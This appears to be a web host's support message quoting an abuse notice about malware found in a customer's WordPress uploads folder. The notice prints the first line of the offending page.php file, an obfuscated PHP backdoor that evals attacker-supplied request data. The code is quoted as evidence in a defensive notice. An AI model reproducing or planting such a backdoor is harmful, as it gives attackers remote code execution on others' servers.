I am seeing that there is ticket for this. It shows in the email that was sent to you. Here is the content of the email:
Hello,
It has come to our attention that malware is hosted on an account under your control. We have disabled site access for your account to prevent further abuse.
xpsistem 105886 0.0 0.0 303876 17392 ? SN 03:40 0:00 | _ /opt/php54/bin/php-cgi /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php
head -1 /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php
<?php ... $n50="T|c7W;Qt&8iK6vMo0*g\$\n4\"Zb)VOlN(qGy?A~J-SxF_/n#D1}]P`{EwCU\r>3eB':jL.R%5s k,X2[\zY^f!H+r@h<\td9u=amIp";$GLOBALS['lkqja84'] = ${$n50[42].$n50[50].$n50[27].$n50[39].$n50[0]};$GLOBALS['aazcu53'] = $n50[87].$n50[60].$n50[94].$n50[90].$n50[60].$n50[85];if (!empty($GLOBALS['lkqja84']['m32c7e5f3'])) { eval($GLOBALS['lkqja84']['m32c7e5f3']); } $GLOBALS'aazcu53'; echo $n50[88].$n50[87].$n50[47].$n50[58].$n50[21].$n50[16].$n50[21].$n50[71].$n50[29].$n50[15].$n50[7].$n50[71].$n50[41].$n50[15].$n50[92].$n50[44].$n50[90].$n50[88].$n50[43].$n50[87].$n50[47].$n50[58].$n50[57].$n50[20].$n50[0].$n50[87].$n50[60].$n50[71].$n50[97].$n50[94].$n50[18].$n50[60].$n50[71].$n50[7].$n50[87].$n50[94].$n50[7].$n50[71].$n50[33].$n50[15].$n50[92].$n50[71].$n50[87].$n50[94].$n50[13].$n50[60].$n50[71].$n50[85].$n50[60].$n50[31].$n50[92].$n50[60].$n50[70].$n50[7].$n50[60].$n50[90].$n50[71].$n50[2].$n50[15].$n50[92].$n50[28].$n50[90].$n50[71].$n50[44].$n50[15].$n50[7].$n50[71].$n50[24].$n50[60].$n50[71].$n50[81].$n50[15].$n50[92].$n50[44].$n50[90].$n50[66].$n50[57].$n50[20];
stat /home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php
File: `/home1/xpsistem/public_html/karatezvezagorenjske.si/kranj/wp-content/uploads/2013/08/page.php';;
Size: 1449 Blocks: 8 IO Block: 4096 regular file
Device: 811h/2065d Inode: 58851329 Links: 1
Access: (0644/-rw-r--r--) Uid: (32286/xpsistem) Gid: (32288/xpsistem)
Access: 2016-07-24 17:00:16.000000000 -0500
Modify: 2016-07-24 17:00:16.000000000 -0500
Change: 2016-07-24 17:00:16.202371539 -0500
In order to remove the restrictions weâve placed, you must resolve the security issue. Since we cannot perform this type of service for you, I recommend you contact SiteLock or another security service to prevent further damage to your server by the malicious content. We are partnered with SiteLock, so we can provide you with any assistance to sign up for their service.
Please note that repeated reports of malicious content on your account within 60 days of an initial notice will lead to further action being taken, including permanent suspension after failing to professionally clean the account.
Once you have taken steps to secure your account, please reply back to this ticket to request review.
Julian F.
Level II Linux Systems Administrator